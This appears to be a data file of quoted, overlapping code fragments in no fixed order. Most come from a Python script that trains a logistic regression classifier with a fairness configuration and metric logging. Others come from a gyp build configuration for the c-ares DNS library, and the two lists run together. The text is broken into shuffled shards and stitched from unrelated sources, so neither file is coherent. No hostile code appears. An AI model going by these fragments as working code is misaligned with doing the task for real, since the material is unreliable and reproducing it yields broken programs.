"(macro) = {precision:.4f}\\n\" f\"\\tRecall (macro) = {recall:.4f}\\n\" f\"\\tF1 score (macro) = {f1_score:.4f}\\n\" f\"\\tROC",
": {value}') # Convert target variable to numeric values # ModelMonitoringService.export_text expect both",
"\"Recall (macro)\": recall, \"F1 Score (macro)\": f1_score, \"ROC AUC (macro)\": roc_auc, \"Avg precision",
"f\"\\tROC AUC (macro) = {roc_auc:.4f}\\n\" f\"\\tAverage precision (macro) = {avg_prc:.4f}\") # Bedrock Logger:",
"as np import pandas as pd from bdrk.model_analyzer import ModelAnalyzer, ModelTypes from boxkite.monitoring.collector",
"of float ) return test_prob, test_pred def main(): x_train, y_train = load_dataset( filepath=TRAIN_DATA_PATH,",
"test_pred, average='macro') roc_auc = metrics.roc_auc_score(y_test_onehot, test_prob, average='macro', multi_class='ovr') avg_prc = metrics.average_precision_score(y_test_onehot, test_prob, average='macro')",
"OUTPUT_MODEL_PATH = env(\"OUTPUT_MODEL_PATH\") TRAIN_DATA_PATH = env(\"TRAIN_DATA_PATH\") TEST_DATA_PATH = env(\"TEST_DATA_PATH\") C = env.float(\"C\") CONFIG_FAI",
"Target variable :type target: str :return: The features pandas dataframe and the target",
"and `average_precision_score` expects # binary label indicators with shape (n_samples, n_classes) enc =",
"= x_train.columns.tolist() print(\"\\nSAMPLE FEATURES\") print({ feature_name: str(x_train[feature_name][0]) for feature_name in feature_names }) joblib.dump([feature_names,",
"model. :param X: Features for training :type X: pandas.core.frame.DataFrame :param y: Target variable",
"Pipeline from sklearn.preprocessing import OneHotEncoder, StandardScaler env = Env() OUTPUT_MODEL_PATH = env(\"OUTPUT_MODEL_PATH\") TRAIN_DATA_PATH",
"AUC (macro) = {roc_auc:.4f}\\n\" f\"\\tAverage precision (macro) = {avg_prc:.4f}\") # Bedrock Logger: captures",
"variable :type target: str :return: The features pandas dataframe and the target numpy",
"sklearn.pipeline.Pipeline \"\"\" verbose and print('\\nTRAIN\\nScaling...') scaling = StandardScaler() X = scaling.fit_transform(X) verbose and",
"= enc.fit_transform(y_train.reshape(-1, 1)) y_test_onehot = enc.fit_transform(y_test.reshape(-1, 1)) print('\\nCATEGORIES') for value, category in enumerate(enc.categories_[0]):",
"Save feature and inferance distribution train_predicted = pipe.predict(x_train).flatten().tolist() collectors = [ FeatureHistogramCollector( data=x_train.iteritems(),",
"(df['Rings'] > 10).astype(int) # Ensure nothing missing original_len = len(df) df.dropna(how=\"any\", axis=0, inplace=True)",
"encoder = MetricEncoder(collectors=collectors) with open(BaselineMetricCollector.DEFAULT_HISTOGRAM_PATH, \"wb\") as f: f.write(encoder.as_text()) print('Saved feature and inference",
"analyzer = ( ModelAnalyzer(pipe[1], model_name='logistic', model_type=ModelTypes.LINEAR) .train_features(x_train) .test_features(x_test) .fairness_config(CONFIG_FAI) .test_labels(y_test) .test_inference(test_pred) ) analyzer.analyze()",
"and print('Chaining pipeline...') pipe = Pipeline([('scaling', scaling), ('model', model)]) verbose and print('Done training.')",
"joblib from typing import Tuple import bdrk import numpy as np import pandas",
") print('X (train)') print(x_train) # sklearn `roc_auc_score` and `average_precision_score` expects # binary label",
"filepath=TEST_DATA_PATH, target='Type' ) print('X (train)') print(x_train) # sklearn `roc_auc_score` and `average_precision_score` expects #",
"and print('\\nTRAIN\\nScaling...') scaling = StandardScaler() X = scaling.fit_transform(X) verbose and print('Fitting...') verbose and",
"load_dataset(filepath: str, target: str) -> Tuple[pd.core.frame.DataFrame, np.ndarray]: \"\"\" Loads the dataset and returns",
"(macro)\": f1_score, \"ROC AUC (macro)\": roc_auc, \"Avg precision (macro)\": avg_prc, } ) #",
"the same `log_chart_data` method bdrk.log_binary_classifier_metrics( y_test_onehot.ravel().astype(int).tolist(), # list of int test_prob.ravel().astype(float).tolist() # list",
"pandas dataframe and the target numpy array :rtype: tuple[pandas.core.frame.DataFrame, numpy.ndarray] \"\"\" df =",
"Specify which column indices are discrete ), InferenceHistogramCollector(data=train_predicted, is_discrete=True) # Specify inference as",
"multiclass labels, we can use a \"micro-average\" by # quantifying score on all",
"be numeric values y_train = np.argmax(y_train_onehot, axis=1) y_test = np.argmax(y_test_onehot, axis=1) pipe =",
"num_rows_dropped > 0: print(f\"Warning - dropped {num_rows_dropped} rows with NA data.\") y =",
"distribution train_predicted = pipe.predict(x_train).flatten().tolist() collectors = [ FeatureHistogramCollector( data=x_train.iteritems(), discrete={7, 8}, # Specify",
"x_train.columns.tolist() print(\"\\nSAMPLE FEATURES\") print({ feature_name: str(x_train[feature_name][0]) for feature_name in feature_names }) joblib.dump([feature_names, enc,",
"the features and trains a logistic regression model. :param X: Features for training",
"metrics.precision_score(y_test, test_pred, average='macro') recall = metrics.recall_score(y_test, test_pred, average='macro') f1_score = metrics.f1_score(y_test, test_pred, average='macro')",
"average='macro', multi_class='ovr') avg_prc = metrics.average_precision_score(y_test_onehot, test_prob, average='macro') print(\"\\nEVALUATION\\n\" f\"\\tAccuracy = {acc:.4f}\\n\" f\"\\tPrecision (macro)",
":type seed: float :param C: Inverse of regularization strength :type C: float :param",
"test_prob, average='macro') print(\"\\nEVALUATION\\n\" f\"\\tAccuracy = {acc:.4f}\\n\" f\"\\tPrecision (macro) = {precision:.4f}\\n\" f\"\\tRecall (macro) =",
"calculate xafai metrics analyzer = ( ModelAnalyzer(pipe[1], model_name='logistic', model_type=ModelTypes.LINEAR) .train_features(x_train) .test_features(x_test) .fairness_config(CONFIG_FAI) .test_labels(y_test)",
"print('Chaining pipeline...') pipe = Pipeline([('scaling', scaling), ('model', model)]) verbose and print('Done training.') return",
"import Env from sklearn import metrics from sklearn.linear_model import LogisticRegression from sklearn.pipeline import",
"\"\"\" Scales the features and trains a logistic regression model. :param X: Features",
":type y_test: numpy.ndarray :param y_test_onehot: One hot encoded target variable data :type y_test_onehot:",
"TEST_DATA_PATH = env(\"TEST_DATA_PATH\") C = env.float(\"C\") CONFIG_FAI = { \"large_rings\": { \"privileged_attribute_values\": [1],",
"and the target variable as a numpy array. :param filepath: Path to load",
"test_pred = pipe.predict(x_test) acc = metrics.accuracy_score(y_test, test_pred) precision = metrics.precision_score(y_test, test_pred, average='macro') recall",
"FeatureHistogramCollector( data=x_train.iteritems(), discrete={7, 8}, # Specify which column indices are discrete ), InferenceHistogramCollector(data=train_predicted,",
"float = 0, C: float = 1, verbose: bool = False) -> Pipeline:",
"ModelAnalyzer, ModelTypes from boxkite.monitoring.collector import ( BaselineMetricCollector, FeatureHistogramCollector, InferenceHistogramCollector ) from boxkite.monitoring.encoder import",
"metrics.roc_auc_score(y_test_onehot, test_prob, average='macro', multi_class='ovr') avg_prc = metrics.average_precision_score(y_test_onehot, test_prob, average='macro') print(\"\\nEVALUATION\\n\" f\"\\tAccuracy = {acc:.4f}\\n\"",
"train_log_reg_model(x_train, y_train, seed=0, C=C, verbose=True) # Save trained model feature_names = x_train.columns.tolist() print(\"\\nSAMPLE",
"feature_names }) joblib.dump([feature_names, enc, pipe], OUTPUT_MODEL_PATH) print('\\nSaved trained one hot encoder and logistic",
"# ModelMonitoringService.export_text expect both features # and inference to be numeric values y_train",
"\"Large\", \"unprivileged_attribute_values\": [0], # unprivileged group name corresponding to values=[0] \"unprivileged_group_name\": \"Small\", }",
"feature and inference distribution.') # Train Shap model and calculate xafai metrics analyzer",
"= False) -> Pipeline: \"\"\" Scales the features and trains a logistic regression",
"return test_prob, test_pred def main(): x_train, y_train = load_dataset( filepath=TRAIN_DATA_PATH, target='Type' ) x_test,",
"and calculate xafai metrics analyzer = ( ModelAnalyzer(pipe[1], model_name='logistic', model_type=ModelTypes.LINEAR) .train_features(x_train) .test_features(x_test) .fairness_config(CONFIG_FAI)",
"\"large_rings\": { \"privileged_attribute_values\": [1], # privileged group name corresponding to values=[1] \"privileged_group_name\": \"Large\",",
"\"micro-average\" by # quantifying score on all classes jointly # See https://scikit-learn.org/stable/auto_examples/model_selection/plot_precision_recall.html #",
"TRAIN_DATA_PATH = env(\"TRAIN_DATA_PATH\") TEST_DATA_PATH = env(\"TEST_DATA_PATH\") C = env.float(\"C\") CONFIG_FAI = { \"large_rings\":",
"pipe.predict(x_train).flatten().tolist() collectors = [ FeatureHistogramCollector( data=x_train.iteritems(), discrete={7, 8}, # Specify which column indices",
"{precision:.4f}\\n\" f\"\\tRecall (macro) = {recall:.4f}\\n\" f\"\\tF1 score (macro) = {f1_score:.4f}\\n\" f\"\\tROC AUC (macro)",
"variable as a numpy array. :param filepath: Path to load the data :type",
"feature_names = x_train.columns.tolist() print(\"\\nSAMPLE FEATURES\") print({ feature_name: str(x_train[feature_name][0]) for feature_name in feature_names })",
"df.dropna(how=\"any\", axis=0, inplace=True) num_rows_dropped = original_len - len(df) if num_rows_dropped > 0: print(f\"Warning",
"estimator :type pipe: sklearn.pipeline.Pipeline :param x_test: Features for testing :type x_test: pandas.core.frame.DataFrame :param",
"env(\"TEST_DATA_PATH\") C = env.float(\"C\") CONFIG_FAI = { \"large_rings\": { \"privileged_attribute_values\": [1], # privileged",
"# For multiclass labels, we can use a \"micro-average\" by # quantifying score",
"model :type seed: float :param C: Inverse of regularization strength :type C: float",
"# Save trained model feature_names = x_train.columns.tolist() print(\"\\nSAMPLE FEATURES\") print({ feature_name: str(x_train[feature_name][0]) for",
"to load the data :type filepath: str :param target: Target variable :type target:",
"unprivileged group name corresponding to values=[0] \"unprivileged_group_name\": \"Small\", } } def load_dataset(filepath: str,",
"= train_log_reg_model(x_train, y_train, seed=0, C=C, verbose=True) # Save trained model feature_names = x_train.columns.tolist()",
"a numpy array. :param filepath: Path to load the data :type filepath: str",
"print('X (train)') print(x_train) # sklearn `roc_auc_score` and `average_precision_score` expects # binary label indicators",
":rtype: tuple[pandas.core.frame.DataFrame, numpy.ndarray] \"\"\" df = pd.read_csv(filepath) df['large_rings'] = (df['Rings'] > 10).astype(int) #",
"x_test: Features for testing :type x_test: pandas.core.frame.DataFrame :param y_test: Target variable data for",
"C = env.float(\"C\") CONFIG_FAI = { \"large_rings\": { \"privileged_attribute_values\": [1], # privileged group",
"test_pred) precision = metrics.precision_score(y_test, test_pred, average='macro') recall = metrics.recall_score(y_test, test_pred, average='macro') f1_score =",
"} } def load_dataset(filepath: str, target: str) -> Tuple[pd.core.frame.DataFrame, np.ndarray]: \"\"\" Loads the",
"load_dataset( filepath=TEST_DATA_PATH, target='Type' ) print('X (train)') print(x_train) # sklearn `roc_auc_score` and `average_precision_score` expects",
"numpy.ndarray] \"\"\" test_prob = pipe.predict_proba(x_test) test_pred = pipe.predict(x_test) acc = metrics.accuracy_score(y_test, test_pred) precision",
"multi_class='ovr') avg_prc = metrics.average_precision_score(y_test_onehot, test_prob, average='macro') print(\"\\nEVALUATION\\n\" f\"\\tAccuracy = {acc:.4f}\\n\" f\"\\tPrecision (macro) =",
"log metrics. :param pipe: Pipeline of transforms with a trained final estimator :type",
"pandas.core.frame.DataFrame :param y: Target variable :type y: numpy.ndarray :param seed: `random_state` for logistic",
"feature and inferance distribution train_predicted = pipe.predict(x_train).flatten().tolist() collectors = [ FeatureHistogramCollector( data=x_train.iteritems(), discrete={7,",
"for logistic regression model :type seed: float :param C: Inverse of regularization strength",
"df, y def train_log_reg_model(X: pd.core.frame.DataFrame, y: np.ndarray, seed: float = 0, C: float",
"classification # For multiclass labels, we can use a \"micro-average\" by # quantifying",
"= metrics.accuracy_score(y_test, test_pred) precision = metrics.precision_score(y_test, test_pred, average='macro') recall = metrics.recall_score(y_test, test_pred, average='macro')",
"), InferenceHistogramCollector(data=train_predicted, is_discrete=True) # Specify inference as discrete ] encoder = MetricEncoder(collectors=collectors) with",
"C: float = 1, verbose: bool = False) -> Pipeline: \"\"\" Scales the",
"dataframe and the target numpy array :rtype: tuple[pandas.core.frame.DataFrame, numpy.ndarray] \"\"\" df = pd.read_csv(filepath)",
"training :type X: pandas.core.frame.DataFrame :param y: Target variable :type y: numpy.ndarray :param seed:",
"# unprivileged group name corresponding to values=[0] \"unprivileged_group_name\": \"Small\", } } def load_dataset(filepath:",
"float ) return test_prob, test_pred def main(): x_train, y_train = load_dataset( filepath=TRAIN_DATA_PATH, target='Type'",
"name corresponding to values=[1] \"privileged_group_name\": \"Large\", \"unprivileged_attribute_values\": [0], # unprivileged group name corresponding",
"xafai metrics analyzer = ( ModelAnalyzer(pipe[1], model_name='logistic', model_type=ModelTypes.LINEAR) .train_features(x_train) .test_features(x_test) .fairness_config(CONFIG_FAI) .test_labels(y_test) .test_inference(test_pred)",
"regression model. :param X: Features for training :type X: pandas.core.frame.DataFrame :param y: Target",
":type x_test: pandas.core.frame.DataFrame :param y_test: Target variable data for testing :type y_test: numpy.ndarray",
"testing :type x_test: pandas.core.frame.DataFrame :param y_test: Target variable data for testing :type y_test:",
"len(df) if num_rows_dropped > 0: print(f\"Warning - dropped {num_rows_dropped} rows with NA data.\")",
"y_test: Target variable data for testing :type y_test: numpy.ndarray :param y_test_onehot: One hot",
"target numpy array :rtype: tuple[pandas.core.frame.DataFrame, numpy.ndarray] \"\"\" df = pd.read_csv(filepath) df['large_rings'] = (df['Rings']",
"from sklearn.linear_model import LogisticRegression from sklearn.pipeline import Pipeline from sklearn.preprocessing import OneHotEncoder, StandardScaler",
"y def train_log_reg_model(X: pd.core.frame.DataFrame, y: np.ndarray, seed: float = 0, C: float =",
"verbose and print('Chaining pipeline...') pipe = Pipeline([('scaling', scaling), ('model', model)]) verbose and print('Done",
"for testing :type x_test: pandas.core.frame.DataFrame :param y_test: Target variable data for testing :type",
"sklearn.linear_model import LogisticRegression from sklearn.pipeline import Pipeline from sklearn.preprocessing import OneHotEncoder, StandardScaler env",
"will allow us to use the same `log_chart_data` method bdrk.log_binary_classifier_metrics( y_test_onehot.ravel().astype(int).tolist(), # list",
"f: f.write(encoder.as_text()) print('Saved feature and inference distribution.') # Train Shap model and calculate",
"import pandas as pd from bdrk.model_analyzer import ModelAnalyzer, ModelTypes from boxkite.monitoring.collector import (",
"regression model.') test_prob, test_pred = compute_log_metrics(pipe, x_test, y_test, y_test_onehot) # Save feature and",
"8}, # Specify which column indices are discrete ), InferenceHistogramCollector(data=train_predicted, is_discrete=True) # Specify",
"pandas.core.frame.DataFrame :param y_test: Target variable data for testing :type y_test: numpy.ndarray :param y_test_onehot:",
"One hot encoded target variable data :type y_test_onehot: numpy.ndarray :return: Test predicted probability",
"-> Pipeline: \"\"\" Scales the features and trains a logistic regression model. :param",
"list of float ) return test_prob, test_pred def main(): x_train, y_train = load_dataset(",
"strength :type C: float :param verbose: Whether to print additional info :type verbose:",
"feature_name in feature_names }) joblib.dump([feature_names, enc, pipe], OUTPUT_MODEL_PATH) print('\\nSaved trained one hot encoder",
":return: Test predicted probability and predictions :rtype: tuple[numpy.ndarray, numpy.ndarray] \"\"\" test_prob = pipe.predict_proba(x_test)",
"np.ndarray, seed: float = 0, C: float = 1, verbose: bool = False)",
"open(BaselineMetricCollector.DEFAULT_HISTOGRAM_PATH, \"wb\") as f: f.write(encoder.as_text()) print('Saved feature and inference distribution.') # Train Shap",
"with NA data.\") y = df[target].values df.drop(target, axis=1, inplace=True) return df, y def",
"= {avg_prc:.4f}\") # Bedrock Logger: captures model metrics bdrk.log_metrics( { \"Accuracy\": acc, \"Precision",
"model_name='logistic', model_type=ModelTypes.LINEAR) .train_features(x_train) .test_features(x_test) .fairness_config(CONFIG_FAI) .test_labels(y_test) .test_inference(test_pred) ) analyzer.analyze() print('Saved Shap model and",
"= LogisticRegression(random_state=seed, C=C, max_iter=4000) model.fit(X, y) verbose and print('Chaining pipeline...') pipe = Pipeline([('scaling',",
"from boxkite.monitoring.encoder import MetricEncoder from environs import Env from sklearn import metrics from",
"Path to load the data :type filepath: str :param target: Target variable :type",
"= {recall:.4f}\\n\" f\"\\tF1 score (macro) = {f1_score:.4f}\\n\" f\"\\tROC AUC (macro) = {roc_auc:.4f}\\n\" f\"\\tAverage",
"y_test_onehot) # Save feature and inferance distribution train_predicted = pipe.predict(x_train).flatten().tolist() collectors = [",
"pd.core.frame.DataFrame, y_test: np.ndarray, y_test_onehot: np.ndarray): \"\"\" Computes, prints and log metrics. :param pipe:",
"`roc_auc_score` and `average_precision_score` expects # binary label indicators with shape (n_samples, n_classes) enc",
"f.write(encoder.as_text()) print('Saved feature and inference distribution.') # Train Shap model and calculate xafai",
"axis=1) y_test = np.argmax(y_test_onehot, axis=1) pipe = train_log_reg_model(x_train, y_train, seed=0, C=C, verbose=True) #",
"joblib.dump([feature_names, enc, pipe], OUTPUT_MODEL_PATH) print('\\nSaved trained one hot encoder and logistic regression model.')",
"y_test_onehot = enc.fit_transform(y_test.reshape(-1, 1)) print('\\nCATEGORIES') for value, category in enumerate(enc.categories_[0]): print(f'{category} : {value}')",
"numpy array. :param filepath: Path to load the data :type filepath: str :param",
"print('Saved Shap model and fairness results.') if __name__ == '__main__': bdrk.init() with bdrk.start_run():",
"= scaling.fit_transform(X) verbose and print('Fitting...') verbose and print('C:', C) model = LogisticRegression(random_state=seed, C=C,",
"y_test_onehot.ravel().astype(int).tolist(), # list of int test_prob.ravel().astype(float).tolist() # list of float ) return test_prob,",
"distribution.') # Train Shap model and calculate xafai metrics analyzer = ( ModelAnalyzer(pipe[1],",
"10).astype(int) # Ensure nothing missing original_len = len(df) df.dropna(how=\"any\", axis=0, inplace=True) num_rows_dropped =",
"and logistic regression model.') test_prob, test_pred = compute_log_metrics(pipe, x_test, y_test, y_test_onehot) # Save",
"average='macro') recall = metrics.recall_score(y_test, test_pred, average='macro') f1_score = metrics.f1_score(y_test, test_pred, average='macro') roc_auc =",
"pd.read_csv(filepath) df['large_rings'] = (df['Rings'] > 10).astype(int) # Ensure nothing missing original_len = len(df)",
"label indicators with shape (n_samples, n_classes) enc = OneHotEncoder(handle_unknown='ignore', sparse=False) y_train_onehot = enc.fit_transform(y_train.reshape(-1,",
"( ModelAnalyzer(pipe[1], model_name='logistic', model_type=ModelTypes.LINEAR) .train_features(x_train) .test_features(x_test) .fairness_config(CONFIG_FAI) .test_labels(y_test) .test_inference(test_pred) ) analyzer.analyze() print('Saved Shap",
"Features for training :type X: pandas.core.frame.DataFrame :param y: Target variable :type y: numpy.ndarray",
"from sklearn import metrics from sklearn.linear_model import LogisticRegression from sklearn.pipeline import Pipeline from",
"- len(df) if num_rows_dropped > 0: print(f\"Warning - dropped {num_rows_dropped} rows with NA",
"test_prob, average='macro', multi_class='ovr') avg_prc = metrics.average_precision_score(y_test_onehot, test_prob, average='macro') print(\"\\nEVALUATION\\n\" f\"\\tAccuracy = {acc:.4f}\\n\" f\"\\tPrecision",
"the target numpy array :rtype: tuple[pandas.core.frame.DataFrame, numpy.ndarray] \"\"\" df = pd.read_csv(filepath) df['large_rings'] =",
"bdrk.log_binary_classifier_metrics( y_test_onehot.ravel().astype(int).tolist(), # list of int test_prob.ravel().astype(float).tolist() # list of float ) return",
"{ \"large_rings\": { \"privileged_attribute_values\": [1], # privileged group name corresponding to values=[1] \"privileged_group_name\":",
"target variable as a numpy array. :param filepath: Path to load the data",
".train_features(x_train) .test_features(x_test) .fairness_config(CONFIG_FAI) .test_labels(y_test) .test_inference(test_pred) ) analyzer.analyze() print('Saved Shap model and fairness results.')",
"metrics.f1_score(y_test, test_pred, average='macro') roc_auc = metrics.roc_auc_score(y_test_onehot, test_prob, average='macro', multi_class='ovr') avg_prc = metrics.average_precision_score(y_test_onehot, test_prob,",
":param y_test: Target variable data for testing :type y_test: numpy.ndarray :param y_test_onehot: One",
"predictions :rtype: tuple[numpy.ndarray, numpy.ndarray] \"\"\" test_prob = pipe.predict_proba(x_test) test_pred = pipe.predict(x_test) acc =",
"f1_score, \"ROC AUC (macro)\": roc_auc, \"Avg precision (macro)\": avg_prc, } ) # `log_chart_data`",
"OUTPUT_MODEL_PATH) print('\\nSaved trained one hot encoder and logistic regression model.') test_prob, test_pred =",
"trained one hot encoder and logistic regression model.') test_prob, test_pred = compute_log_metrics(pipe, x_test,",
"same `log_chart_data` method bdrk.log_binary_classifier_metrics( y_test_onehot.ravel().astype(int).tolist(), # list of int test_prob.ravel().astype(float).tolist() # list of",
"This will allow us to use the same `log_chart_data` method bdrk.log_binary_classifier_metrics( y_test_onehot.ravel().astype(int).tolist(), #",
"np.ndarray): \"\"\" Computes, prints and log metrics. :param pipe: Pipeline of transforms with",
"y_test, y_test_onehot) # Save feature and inferance distribution train_predicted = pipe.predict(x_train).flatten().tolist() collectors =",
"bdrk import numpy as np import pandas as pd from bdrk.model_analyzer import ModelAnalyzer,"
"'cares', 'type': '<(library)', 'include_dirs': [ 'include', 'src/lib' ], 'direct_dependent_settings': { 'include_dirs': [ 'include',",
"'target_defaults': { 'conditions': [ ['OS!=\"win\"', { 'defines': [ '_DARWIN_USE_64_BIT_INODE=1', '_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64', '_GNU_SOURCE' ]",
"'conditions': [ [ 'library==\"static_library\"', { 'defines': [ 'CARES_STATICLIB' ] }, { 'defines': [",
"{ 'target_defaults': { 'conditions': [ ['OS!=\"win\"', { 'defines': [ '_DARWIN_USE_64_BIT_INODE=1', '_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64', '_GNU_SOURCE'",
"'src/lib/ares_nameser.h', 'src/lib/ares_nowarn.c', 'src/lib/ares_nowarn.h', 'src/lib/ares_options.c', 'src/lib/ares__parse_into_addrinfo.c', 'src/lib/ares_parse_aaaa_reply.c', 'src/lib/ares_parse_a_reply.c', 'src/lib/ares_parse_caa_reply.c', 'src/lib/ares_parse_mx_reply.c', 'src/lib/ares_parse_naptr_reply.c', 'src/lib/ares_parse_ns_reply.c', 'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c',",
"}], [ 'OS==\"openbsd\"', { 'include_dirs': [ 'config/openbsd' ], 'sources': [ 'config/openbsd/ares_config.h' ] }],",
"'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c', 'src/lib/ares_version.c', 'src/lib/ares_writev.c', 'src/lib/ares_writev.h', 'src/lib/bitncmp.c', 'src/lib/bitncmp.h',",
"], 'direct_dependent_settings': { 'libraries': [ '-lsocket', '-lnsl' ] } }] ] } ]",
"'src/lib/ares_platform.h', 'src/lib/ares_private.h', 'src/lib/ares_process.c', 'src/lib/ares_query.c', 'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c', 'src/lib/ares_send.c', 'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c',",
"'src/lib/ares_platform.c' ], 'libraries': [ '-lws2_32.lib', '-liphlpapi.lib' ], }, { # Not Windows i.e.",
"] }], [ 'OS==\"aix\"', { 'include_dirs': [ 'config/aix' ], 'sources': [ 'config/aix/ares_config.h' ],",
"{ 'cflags': [ '--std=gnu89' ], }], [ 'OS==\"linux\"', { 'include_dirs': [ 'config/linux' ],",
"[ 'config/aix' ], 'sources': [ 'config/aix/ares_config.h' ], 'defines': [ # Support for malloc(0)",
"] }] ] }, 'targets': [ { 'target_name': 'cares', 'type': '<(library)', 'include_dirs': [",
"'config/sunos' ], 'sources': [ 'config/sunos/ares_config.h' ], 'direct_dependent_settings': { 'libraries': [ '-lsocket', '-lnsl' ]",
"{ 'defines': [ 'CARES_BUILDING_LIBRARY' ] }], [ 'OS==\"win\"', { 'defines': [ 'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS',",
"{ 'conditions': [ ['OS!=\"win\"', { 'defines': [ '_DARWIN_USE_64_BIT_INODE=1', '_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64', '_GNU_SOURCE' ] }],",
"# Support for malloc(0) '_LINUX_SOURCE_COMPAT=1', '_ALL_SOURCE=1'], }], ['OS==\"solaris\"', { 'defines': [ '__EXTENSIONS__', '_XOPEN_SOURCE=500'",
"'src/lib/ares_search.c', 'src/lib/ares_send.c', 'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c', 'src/lib/ares_version.c',",
"'<(library)', 'include_dirs': [ 'include', 'src/lib' ], 'direct_dependent_settings': { 'include_dirs': [ 'include', 'src/lib' ]",
"'src/lib/ares_data.c', 'src/lib/ares_data.h', 'src/lib/ares_destroy.c', 'src/lib/ares_expand_name.c', 'src/lib/ares_expand_string.c', 'src/lib/ares_fds.c', 'src/lib/ares_free_hostent.c', 'src/lib/ares_free_string.c', 'src/lib/ares_freeaddrinfo.c', 'src/lib/ares_getenv.h', 'src/lib/ares_getaddrinfo.c', 'src/lib/ares_gethostbyaddr.c', 'src/lib/ares_gethostbyname.c',",
"'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c', 'src/lib/ares_strcasecmp.c', 'src/lib/ares_strcasecmp.h', 'src/lib/ares_strdup.c', 'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c', 'src/lib/ares_version.c', 'src/lib/ares_writev.c', 'src/lib/ares_writev.h',",
"], 'sources': [ 'config/freebsd/ares_config.h' ] }], [ 'OS==\"openbsd\"', { 'include_dirs': [ 'config/openbsd' ],",
"'config/openbsd' ], 'sources': [ 'config/openbsd/ares_config.h' ] }], [ 'OS==\"android\"', { 'include_dirs': [ 'config/android'",
"] }], [ 'OS==\"win\"', { 'defines': [ 'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS', ], 'include_dirs': [ 'config/win32'",
"\"win android\"', { 'cflags': [ '--std=gnu89' ], }], [ 'OS==\"linux\"', { 'include_dirs': [",
"[ 'config/darwin' ], 'sources': [ 'config/darwin/ares_config.h' ] }], [ 'OS==\"freebsd\" or OS==\"dragonflybsd\"', {",
"'src/lib/ares_strdup.h', 'src/lib/ares_strerror.c', 'src/lib/ares_strsplit.c', 'src/lib/ares_timeout.c', 'src/lib/ares__timeval.c', 'src/lib/ares_version.c', 'src/lib/ares_writev.c', 'src/lib/ares_writev.h', 'src/lib/bitncmp.c', 'src/lib/bitncmp.h', 'src/lib/inet_net_pton.c', 'src/lib/inet_ntop.c', 'src/lib/ares_inet_net_pton.h',",
"}], [ 'OS==\"solaris\"', { 'include_dirs': [ 'config/sunos' ], 'sources': [ 'config/sunos/ares_config.h' ], 'direct_dependent_settings':",
"'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h', 'src/lib/ares_private.h', 'src/lib/ares_process.c', 'src/lib/ares_query.c', 'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c', 'src/lib/ares_send.c', 'src/lib/ares_setup.h', 'src/lib/ares__sortaddrinfo.c',",
"'include_dirs': [ 'config/linux' ], 'sources': [ 'config/linux/ares_config.h' ] }], [ 'OS==\"mac\"', { 'include_dirs':",
"[ 'config/sunos/ares_config.h' ], 'direct_dependent_settings': { 'libraries': [ '-lsocket', '-lnsl' ] } }] ]",
"'OS==\"android\"', { 'include_dirs': [ 'config/android' ], 'sources': [ 'config/android/ares_config.h' ], }], [ 'OS==\"solaris\"',",
"'src/lib/ares_parse_ptr_reply.c', 'src/lib/ares_parse_soa_reply.c', 'src/lib/ares_parse_srv_reply.c', 'src/lib/ares_parse_txt_reply.c', 'src/lib/ares_platform.h', 'src/lib/ares_private.h', 'src/lib/ares_process.c', 'src/lib/ares_query.c', 'src/lib/ares__read_line.c', 'src/lib/ares__readaddrinfo.c', 'src/lib/ares_search.c', 'src/lib/ares_send.c', 'src/lib/ares_setup.h',",
"[ 'CARES_BUILDING_LIBRARY' ] }], [ 'OS==\"win\"', { 'defines': [ 'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS', ], 'include_dirs':",
"'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS', ], 'include_dirs': [ 'config/win32' ], 'sources': [ 'src/lib/config-win32.h', 'src/lib/windows_port.c', 'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h',",
"'defines': [ '_DARWIN_USE_64_BIT_INODE=1', '_LARGEFILE_SOURCE', '_FILE_OFFSET_BITS=64', '_GNU_SOURCE' ] }], [ 'OS==\"aix\"', { 'include_dirs': [",
"'CARES_BUILDING_LIBRARY' ] }], [ 'OS==\"win\"', { 'defines': [ 'CARES_PULL_WS2TCPIP_H=1', '_WINSOCK_DEPRECATED_NO_WARNINGS', ], 'include_dirs': [",
"], 'sources': [ 'config/linux/ares_config.h' ] }], [ 'OS==\"mac\"', { 'include_dirs': [ 'config/darwin' ],",
"'defines': [ 'CARES_STATICLIB' ] }, { 'defines': [ 'CARES_BUILDING_LIBRARY' ] }], [ 'OS==\"win\"',",
"'src/lib/ares_getenv.c', 'src/lib/ares_iphlpapi.h', 'src/lib/ares_platform.c' ], 'libraries': [ '-lws2_32.lib', '-liphlpapi.lib' ], }, { # Not",
"'config/darwin/ares_config.h' ] }], [ 'OS==\"freebsd\" or OS==\"dragonflybsd\"', { 'include_dirs': [ 'config/freebsd' ], 'sources':",
